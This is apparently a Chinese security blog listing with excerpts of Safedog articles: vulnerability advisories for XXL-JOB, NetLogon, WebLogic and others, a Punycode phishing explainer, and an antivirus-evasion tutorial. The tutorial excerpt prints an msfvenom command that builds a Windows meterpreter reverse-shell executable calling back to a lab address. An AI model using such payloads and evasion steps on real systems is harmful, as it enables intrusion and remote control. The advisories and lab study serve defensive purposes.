作者:safedog@jane

【高危安全通告】XXL-JOB未授权访问漏洞风险通告

近日,安全狗关注到业界披露XXL-JOB存在未授权访问漏洞。XXL-JOB是一个分布式任务调度平台,在默认情况下XXL-JOB没有配置安全认证,攻击者可以在未授权的情况下发送恶意构造的请求触发远程代码执行。 安全狗提醒使用XXL-JOB的用户及时安排自检并做好安全加固。 安全通告信息 漏洞名称XXL-JOB未授权访问漏洞漏洞……

安全课堂|如何开展常态化漏洞运营工作?

网络安全的本质在于对抗,而对抗的本质则在于攻防两端能力的较量。在大型攻防对抗演练活动中,主机漏洞是攻击手最喜欢利用的安全风险,而对防守单位来说,如何快速发现、消除0/1day高危漏洞风险,已成为大型攻防对抗演练的取胜之匙。 想解决资产导致的风险问题,提升系统的安全防护能力的话,首先我们要明确保护的对……

浅析Punycode钓鱼攻击

0x01 Punycode钓鱼攻击 1.1什么是网络钓鱼? 网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼法或钓鱼式攻击)是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。 攻击者利……

【高危安全通告】NetLogon特权提升漏洞风险通告

NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器,也用于 NTP 响应认证以及更新计算机域密码。 安全狗安全威胁情报中心注意到有国外安全厂商将NetLogon特权提升漏洞(CVE-2020-1472)的详细技术分析和验证脚本公开上传到git……

Metasploit免杀初探索

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe 原始生成后,完全被查杀 VT查杀55/69 0x03 编码处理 这里使用msf自带的编码器进……

【高危安全通告】Jackson-databind远程代码执行漏洞

近日,安全狗关注到jackson-databind官方发布最新版本,当中修复了一处反序列化远程代码执行漏洞(CVE-2020-24616),漏洞存在于br.com.anteros:Anteros-DBCP库类中,攻击者可以通过精心构造的请求包在受影响的 Jackson 服务器上进行远程代码执行。 安全狗提醒使用jackson-databind的用户及时安排自检并做好安全加固……

【高危安全通告】宝塔面板数据库管理未授权访问漏洞

2020年8月23日,安全狗应急响应中心监测到宝塔官方发布的安全更新,修复了一处未授权访问的漏洞。 宝塔面板是一款使用方便、功能强大且终身免费的服务器管理软件,支持Linux与Windows系统。近日宝塔面馆官方发布了安全更新,修复了一处高危漏洞。攻击者通过访问特定路径,可以直接访问到phpmyadmin数据库管理界面,并……

【高危安全通告】Nexus Repository Manager 3.x 远程命令执行漏洞

近日,Sonatype Security Team官方发布了一则关于Nexus Repository Manager 3.x产品的远程代码执行漏洞通告。 Sonatype Nexus Repository 是一个开源的仓库管理系统,在安装、配置、使用简单的基础上提供了更加丰富的功能。近日Sonatype官方发布安全公告披露了在Nexus Repository Manager 3.x 版本中……

【高危安全通告】WebSphere Application Server远程代码执行漏洞

近日,安全狗安全运营中心监测到,WebSphere Application Server被曝存在一处IIOP反序列化漏洞(漏洞编号:CVE-2020-4450),漏洞被利用可导致远程代码执行。 为避免您的业务受影响,安全狗建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 WebSphere Application Server ……

【高危安全通告】Weblogic 多个远程代码执行漏洞

2020年7月14日,安全狗应急响应中心监测到Oracle官方发布安全公告,披露WebLogic服务器存在多个高危漏洞,包括反序列化等。黑客利用漏洞可能可以远程获取WebLogic服务器权限,风险较大。 WebLogic 是美国 Oracle 公司出品的 Java 应用服务器,WebLogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和……